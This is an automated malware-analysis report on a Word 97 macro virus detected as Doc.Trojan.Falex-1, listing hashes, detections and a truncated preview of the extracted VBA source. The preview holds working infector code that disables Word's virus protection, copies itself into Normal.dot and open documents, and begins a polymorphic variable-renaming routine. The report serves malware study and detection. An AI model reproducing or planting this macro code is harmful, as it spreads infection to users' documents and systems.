Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35c8c9118ded6f39…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-02-05 21:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 03575f65cf3186f27e134bcc342955f1 SHA-1: f33db6681502b4a96eea0663356b684fc4f5f7ad SHA-256: 35c8c9118ded6f39a81ade66af93dc2be1f0d630e4b514db18f5dc999c2843f7
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word 97 document containing malicious VBA macros. The script attempts to copy its own code into the Normal.dot template, indicating a likely attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Falex-1' further supports the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.Falex-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Falex-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18744 bytes
SHA-256: 4e64e814976ca8e110d55a677ee5180e8bd0186b2ca1a2ffe7565dd564e15cb3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"

Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String

Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)


DocumentInfected = Falsex
NormalTemplateInfected = Falsex

If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex

Options.VirusProtection = Falsex

If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
   
  If DocumentInfected = Truex Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
    
    Call AppendLog(OurCode)
    Call PolyIt(OurCode)

    normaltmp.CodeModule.InsertLines One, OurCode
    
    If SaveNormalTemplate = Truex Then NormalTemplate.Save
    
  End If


  ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
  If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = normaltmp.CodeModule.Lines(1, normaltmp.CodeModule.CountOfLines)
    
    activedoc.CodeModule.InsertLines One, OurCode
    
    If SaveDocument = Truex Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub


Private Sub PolyIt(ByRef OurCode As String)

On Error Resume Next

Const PolyItVarCount = 16, VarCount = PolyItVarCount + 23, UpperLimit = 15, LowerLimit = 5, AsciiA = 65, AsciiZ = 90, One = 1

Dim Variable(One To VarCount), Variable2(One To VarCount), NewCode As String
Dim CounterI, CounterJ, CounterK As Integer
Dim Changed As Boolean

Variable(1) = "OurCode"
Variable(2) = "VarCount"
Variable(3) = "Variable"
Variable(4) = "Variable2"
Variable(5) = "NewCode"
Variable(6) = "CounterI"
Variable(7) = "CounterJ"
Variable(8) = "CounterK"
Variable(9) = "Changed"
Variable(10) = "PolyIt"
Variable(11) = "PolyItVarCount"
Variable(12) = "UpperLimit"
Variable(13) = "LowerLimit"
Variable(14) = "AsciiA"
Variable(15) = "AsciiZ"
Variable(16) = "One"

Variable(PolyItVarCount + 1) = "SaveDocument"
Variable(PolyItVarCount + 2) = "SaveNormalTemplate"
Variable(PolyItVarCount + 3) = "DocumentInfected"
Variable(PolyItVarCount + 4) = "NormalTemplateInfected"
Variable(PolyItVarCount + 5) = "activedoc"
Variable(PolyItVarCount + 6) = "normaltmp"
Variable(PolyItVarCount + 7) = "AppendLog"
Variable(PolyItVarCount + 8) = "UserAddy"
Variable(PolyItVarCount + 9) = "Chr13"
Variable(PolyItVarCount + 10) = "Chr10"
Variable(PolyItVarCount + 11) = "Comment"
Variable(PolyItVarCount + 12) = "UserAddyTmp"
Variable(PolyItVarCount + 13) = "UserNameTmp"
Variable(PolyItVarCount + 14) = "TimeDate"
Variable(PolyItVarCount + 15) = "ActiveDocName"
Variable(PolyItVarCount + 16) = "Truex"
Variable(PolyItVarCount + 17) = "Falsex"
Variable(PolyItVarCount + 18) = "Zero"
Variable(PolyItVarCount + 19) = "wdFormatDocumentx"
Variable(PolyItVarCount + 20) = "wdFormatTemplatex"
Variable(PolyItVarCount + 21) = "TimeFormat"
Variable(PolyItVarCount + 22) = "DateFormat"
Variable(PolyItVarCount + 23) = "DoubleDot"

Randomize

For CounterI = One To VarCount
  For CounterJ = One To Int((UpperLimit - LowerLimit + One) * Rnd + LowerLimit)
    Variable2(CounterI) = Variable2(CounterI) & Chr(Int((AsciiZ - AsciiA + 1) * Rnd + AsciiA))
  Next CounterJ

... (truncated)